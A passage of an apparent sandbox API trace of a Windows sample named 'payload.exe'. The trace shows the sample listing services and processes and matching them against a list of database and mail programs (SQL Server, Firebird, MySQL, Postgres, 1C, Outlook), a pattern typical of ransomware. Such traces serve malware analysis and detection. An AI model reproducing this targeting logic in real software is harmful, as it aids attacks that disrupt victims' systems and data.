[0273.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0273.493] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0273.493] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0273.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0273.493] lstrlenW (lpString="MpsSvc") returned 6 [0273.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0273.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0273.493] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0273.493] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0273.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0273.493] lstrlenW (lpString="NlaSvc") returned 6 [0273.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0273.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0273.493] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0273.493] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0273.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0273.493] lstrlenW (lpString="nsi") returned 3 [0273.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0273.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0273.493] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0273.493] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0273.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0273.493] lstrlenW (lpString="PcaSvc") returned 6 [0273.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0273.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0273.494] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0273.494] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0273.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0273.494] lstrlenW (lpString="PlugPlay") returned 8 [0273.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0273.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0273.494] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0273.494] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0273.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0273.494] lstrlenW (lpString="Power") returned 5 [0273.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0273.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0273.494] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0273.494] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0273.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0273.494] lstrlenW (lpString="ProfSvc") returned 7 [0273.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0273.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0273.494] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0273.494] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0273.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0273.494] lstrlenW (lpString="RpcEptMapper") returned 12 [0273.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0273.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0273.494] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0273.494] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0273.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0273.494] lstrlenW (lpString="RpcSs") returned 5 [0273.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0273.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0273.495] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0273.495] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0273.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0273.495] lstrlenW (lpString="SamSs") returned 5 [0273.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0273.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0273.495] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0273.495] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0273.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0273.495] lstrlenW (lpString="Schedule") returned 8 [0273.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0273.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0273.495] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0273.495] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0273.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0273.495] lstrlenW (lpString="SENS") returned 4 [0273.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0273.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0273.495] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0273.495] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0273.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0273.495] lstrlenW (lpString="ShellHWDetection") returned 16 [0273.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0273.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0273.495] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0273.495] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0273.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0273.495] lstrlenW (lpString="Spooler") returned 7 [0273.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0273.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0273.496] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0273.496] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0273.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0273.496] lstrlenW (lpString="Themes") returned 6 [0273.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0273.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0273.496] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0273.496] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0273.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0273.496] lstrlenW (lpString="UxSms") returned 5 [0273.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0273.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0273.496] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0273.496] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0273.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0273.496] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57d8c0 | out: hHeap=0x520000) returned 1 [0273.496] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x37c [0273.497] Process32FirstW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.497] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0273.497] lstrlenW (lpString="System") returned 6 [0273.497] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0273.497] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0273.497] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0273.497] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0273.497] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0273.497] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0273.497] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0273.497] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0273.498] lstrlenW (lpString="smss.exe") returned 8 [0273.498] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0273.498] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0273.498] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0273.498] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0273.498] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0273.498] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0273.498] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0273.498] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.498] lstrlenW (lpString="csrss.exe") returned 9 [0273.498] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0273.498] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0273.498] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0273.498] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0273.498] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0273.498] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0273.498] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0273.498] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0273.500] lstrlenW (lpString="wininit.exe") returned 11 [0273.500] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0273.500] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0273.500] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0273.500] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0273.500] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0273.500] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0273.500] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0273.500] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.501] lstrlenW (lpString="csrss.exe") returned 9 [0273.501] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0273.501] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0273.501] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0273.501] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0273.501] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0273.501] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0273.501] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0273.501] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0273.501] lstrlenW (lpString="winlogon.exe") returned 12 [0273.501] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0273.501] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0273.501] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0273.501] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0273.501] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0273.501] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0273.501] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0273.501] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0273.502] lstrlenW (lpString="services.exe") returned 12 [0273.502] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0273.502] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0273.502] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0273.502] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0273.502] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0273.502] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0273.502] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0273.502] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0273.502] lstrlenW (lpString="lsass.exe") returned 9 [0273.502] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0273.502] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0273.502] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0273.502] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0273.502] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0273.502] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0273.502] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0273.502] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0273.503] lstrlenW (lpString="lsm.exe") returned 7 [0273.503] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0273.503] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0273.503] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0273.503] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0273.503] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0273.503] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0273.503] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0273.503] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.503] lstrlenW (lpString="svchost.exe") returned 11 [0273.503] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.503] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.503] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.503] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.503] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.503] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.503] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.503] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.504] lstrlenW (lpString="svchost.exe") returned 11 [0273.504] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.504] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.504] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.504] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.504] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.504] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.504] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.504] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.504] lstrlenW (lpString="svchost.exe") returned 11 [0273.504] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.504] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.504] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.504] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.504] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.504] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.504] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.504] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.504] lstrlenW (lpString="svchost.exe") returned 11 [0273.505] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.505] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.505] lstrlenW (lpString="svchost.exe") returned 11 [0273.505] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.505] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0273.505] lstrlenW (lpString="audiodg.exe") returned 11 [0273.505] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.506] lstrlenW (lpString="svchost.exe") returned 11 [0273.506] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.506] lstrlenW (lpString="svchost.exe") returned 11 [0273.506] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0273.506] lstrlenW (lpString="userinit.exe") returned 12 [0273.506] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0273.506] lstrlenW (lpString="dwm.exe") returned 7 [0273.506] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0273.507] lstrlenW (lpString="explorer.exe") returned 12 [0273.507] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0273.507] lstrlenW (lpString="spoolsv.exe") returned 11 [0273.507] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0273.507] lstrlenW (lpString="taskhost.exe") returned 12 [0273.507] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.507] lstrlenW (lpString="svchost.exe") returned 11 [0273.507] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0273.508] lstrlenW (lpString="payload.exe") returned 11 [0273.508] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0273.508] lstrlenW (lpString="dllhost.exe") returned 11 [0273.508] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0273.508] lstrlenW (lpString="reader_sl.exe") returned 13 [0273.508] Process32NextW (in: hSnapshot=0x37c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0273.508] CloseHandle (hObject=0x37c) returned 1 [0273.508] Sleep (dwMilliseconds=0x1f4) [0274.217] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c09d0 [0274.288] EnumServicesStatusExW (in: hSCManager=0x43c09d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0274.288] GetLastError () returned 0xea [0274.288] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc9a) returned 0x57d8c0 [0274.288] EnumServicesStatusExW (in: hSCManager=0x43c09d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x57d8c0, cbBufSize=0xc9a, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | 